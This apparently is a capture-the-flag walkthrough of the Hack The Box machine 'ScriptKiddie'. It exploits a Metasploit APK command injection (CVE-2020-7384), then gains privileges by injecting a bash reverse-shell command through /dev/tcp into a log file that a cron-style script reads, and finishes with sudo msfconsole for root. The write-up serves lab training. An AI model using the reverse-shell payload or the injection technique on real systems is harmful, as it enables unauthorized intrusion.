Adventures with Bits

ScriptKiddie - HTB

The goal of this write-up is to provide an instinct and supporting materials to work on the machine to reach the solution. i would like to provide a methodology or instinct that you may use to solve the boxes.

The main goal of CTFs and specially Hack the Box platform is to provide hands on experience and knowledge, it is not about the solution it is about the gain of skill and knowledge. owning the machine and be on ranking does not give anything if you are not gained anything from the machine. not only the solution actually the exploits and vulnerabilities will give much more information which will be useful in all aspects. I usually not only enjoy the solution of the machine i prioritize the path of the solution and the exploits that used to aid the solution.

The point of scanning and initial information gathering is to point our direction of instinct to a certain path to think about all the possibilities. lets start from nmap scan.
Initial scan may done on hundred different ways, you may ask which type of scan should be done at first phase. we can maintain a scanning methodology which will cover all ports, tcp, udp, script scanning and etc. but which will take time to point into one direction. if you are engaged with penetration testing assessment that would be ideal to maintain a "master" scan routine, however in CTFs it would be efficient to step up to the next level of scanning only if you not found any grip at least for the easy machines/boxes. from the above scan result it was found that port 22 and 5000 opened, generally ssh service also have vulnerabilities to exploit but here picking port 5000 would be appropriate since we know basically this is a intentionally vulnerable box and port 5000 giving the below interface which we can relate with the machine name 'script kiddie'

Web application is presented here with the tools, when inspecting web application first look at the source code where we can extract some more information which we can use. inspecting upon the source code, there is no any possibilities or chance to exploit web technologies such as PHP, Wordpress and etc. based on the analysis now we can move on to the next possibility to exploit available tools on the application.


Before being jump into the exploitation part need to verify that these tools are working properly, after that first starts with nmap. during the search there is no any available exploits to run against nmap, so move on to the next one which is metasploit-framework.

There is a vulnerability for the metasploit-framework (CVE-2020-7384)

let's look at this vulnerability.

Above links provides a very good explanation of the vulnerability, actually the vulnerability is comes under "Improper Neutralization of Special Elements used in a Command - CWE-77". The vulnerability resides under below code block.
              	keytool -genkey -v -keystore #{keystore} \
              -alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \
              -keysize 2048 -startdate '#{orig_cert_startdate}' \
              -validity #{orig_cert_validity} -dname '#{orig_cert_dname}'

When analyzing the above commit you can see that 'orig_cert_dname' was obtained from where the original APK was parsed and the "Owner" field was extracted from the APK's signature.


This command string is passed to the 'run_cmd' function, by looking at this specific portion it is possible to inject commands by inserting a single quote (to escape the single-quoted string) and followed by shell meta characters. Justin Steven provided a POC python script to inject commands in apk file.


so lets exploit this vulnerability to get remote code execution. metasploit it self contains exploit for this vulnerability.


by setting exploit options and uploading generated apk as template file, remote connection has been established.


basically for the privilege escalation before being step into additional enumeration, always look for local configuration files, logs and stuff. user credentials and other things can be found to move further. user.txt file is found under 'kid' directory. moving on, it was found that flask application python source code.


Analyzing the flask application source code i found below function which is interesting to look on.

        def searchsploit(text, srcip):
           if regex_alphanum.match(text):
                 result = subprocess.check_output(['searchsploit', '--color', text])
                 return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore'))
                 with open('/home/kid/logs/hackers', 'a') as f:
                 f.write(f'[{}] {srcip}\n')
                 return render_template('index.html', sserror="stop hacking me - well hack you back")

'regex_alphanum' is defined in the source code, if anything that doesn't match 'regex_alphanum' hackers file has been written with source ip and time. so lets look at hackers file which is under /home/kid/logs/. hackers file is empty and it clearing the written logs quickly. searching through the directories i found file under pwn directory.


               cd /home/pwn/

               cat $log | cut -d' ' -f3- | sort -u | while read ip; do
               sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &

               if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi   
       file actually getting input from hackers file and doing nmap scan for top 10 ports. so basically analyzing this whole stuff, there is a chance to inject commands in hackers file to get executed, since there is no any filter. to do that first need to know how does hackers file saving logs. by running the python code snippet i found log is written in this format - [2021-06-20 13:35:04.728843]

image removing unwanted characters and scanning the IP with nmap, so based on the output there are three items has been written to the hackers file. so to inject command i need to write something below to hackers file. 'A B C; COMMAND'. so to get reverse shell i have written this payload to the hackers file. echo "12 13 14; bash -c 'bash -i >& /dev/tcp/ 0>&1' # ." > hackers in the above payload first four items are just random numbers and IP then the payload is appended. by writing the payload reverse connection has been initiated for the user pwn.


by running sudo -l, it was found that '/opt/metasploit-framework-6.0.9/msfconsole' can be run with sudo. running msfconsole with sudo given root privileges and root.txt found under root directory.

